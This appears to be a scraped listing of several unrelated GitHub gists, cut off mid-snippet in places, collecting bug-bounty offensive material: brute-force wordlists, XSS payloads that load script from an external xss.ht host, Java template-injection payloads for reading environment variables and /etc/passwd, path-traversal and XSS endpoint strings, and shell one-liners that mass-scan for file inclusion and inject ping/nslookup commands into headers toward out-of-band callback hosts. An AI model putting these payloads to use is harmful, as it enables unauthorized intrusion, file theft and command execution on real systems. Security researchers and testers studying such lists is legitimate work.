Emad Shanab (emadshanab)
Sachinart / bruteforce-all-subdomains-directory-wordlist.txt
Created November 5, 2022 08:09
custom directory list to bruteforce all subdomains
/index.php.bak
/backup.bak
/index.aspx.bak
/Index.aspx.bak
/Download.aspx.bak
/search.php.bak
/wordpress-db.php.bak
/db.php.bak
/phpinfo.php
/info.php
id: swagger-ui
info:
name: Swagger UI
author: vidocsecurity
severity: low
description: Swagger UI exposes information about endpoints and sometimes it is vulnerable to XSS
tags: swagger-ui,exposure
requests:
"><script src=https://username.xss.ht></script>
'><script src=https://username.xss.ht></script>
";eval('var a=document.createElement(\'script\');a.src=\'https://username.xss.ht\';document.body.appendChild(a)')
kavishkagihan / java-ssti.md
Last active November 29, 2024 18:12
Java ssti payloads to read remote files and get RCE
  • Typically Java SSTI payloads start with `$`. But if that character is banned, you can use `*` instead.

  • Get env vars

*{T(java.lang.System).getenv()}
  • Read files (/etc/passwd)
GuanacoDevs / requests.json
Created June 28, 2022 15:09
Endpoints used
[
"/ui/vropspluginui/rest/services/getstatus",
"/ghost/preview",
"/wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/?page=cnss_social_icon_page",
"/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq';%7D%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/log_download.cgi?type=../../etc/passwd",
"/templates/m/inc_head.php?q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00",
0x3n0 / oneliner
Last active January 21, 2023 10:10
assetfinder https://exmple.com | gau --subs | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=1"><svg onload=alert(1)>/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars";done
assetfinder https://exmple.com | gau --subs https://exmple.com | gf lfi | place "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
gf lfi output/domains.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H "Host: $(hostname).burpcollab.net" -H "Referer: 8.8.8.8;ping -c 3 $(hostname).burpcollab.net" -H "X-Forwarded-Host: 8.8.8.8;nslookup+callesvmkd63gvfclgjg63ktieresg7dt.oast.online" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/101.0.4951.64 Safari/537.36" -w ~/wordlist.txt -fc 405 -mc 200,403 -ac true; done
### DNS rebinding for RCE
gf lfi output/*.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H
m4ll0k / alloauth.txt
Last active August 31, 2024 06:08
Social and Services OAuth Sign-In Wordlist
/plaid/mobile/oauth_callback
/callback
/oauth2/idpresponse
/signin-google
/twitter_oauth_signin
/soundcloud_oauth_signin
/23andme_oauth_signin
/500px_oauth_signin
/agave_oauth_signin
/amazon_oauth_signin
id: CVE-2022-30525-initial-detect
info:
name: Zyxel Unauthenticated Remote Command Injection
author: z3r00t
severity: info
tags: CVE-2022-30525,Zyxel RCE
requests:
- method: GET
righettod / CVE-2022-21449.yaml
Last active December 18, 2023 06:50
Nuclei template to detect exposure to CVE-2022-21449 by the JWT validation API in place.
id: CVE-2022-21449
info:
name: CVE-2022-21449 test exposure
description: JDK 15-18 have a vulnerability in ECDSA signature validation, so this template detects exposure to CVE-2022-21449 through the JWT validation API in place.
author: righettod
severity: info
tags: cve,2022,java
reference: https://neilmadden.blog/2022/04/19/psychic-signatures-in-java
curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json |jq -r '.vulnerabilities[].cveID' > cves.txt
subfinder -d tesla.com -silent |dnsx -silent -a -resp-only |sort -u |xargs -n1 -P 1500 -I% curl -s http://networktools.nl/whois/$url% |grep "CIDR" |cut -d : -f2 |tr , "\n"| awk '{$1=$1};1' |sort -u |egrep -v "/8|/9|/10|/11|/12|/13|/14|/15|/16" |while read ip ;do whois -h whois.cymru.com " -v $ip" ;done |grep -v "BGP Prefix" |cut -d '|' -f3 |awk '{$1=$1};1' |sort -u |cidr2ip |sort -u |nrich - |grep -B4 -f cves.txt | tee shodan.txt; slackcat --channel bugbounty --filename shodan.txt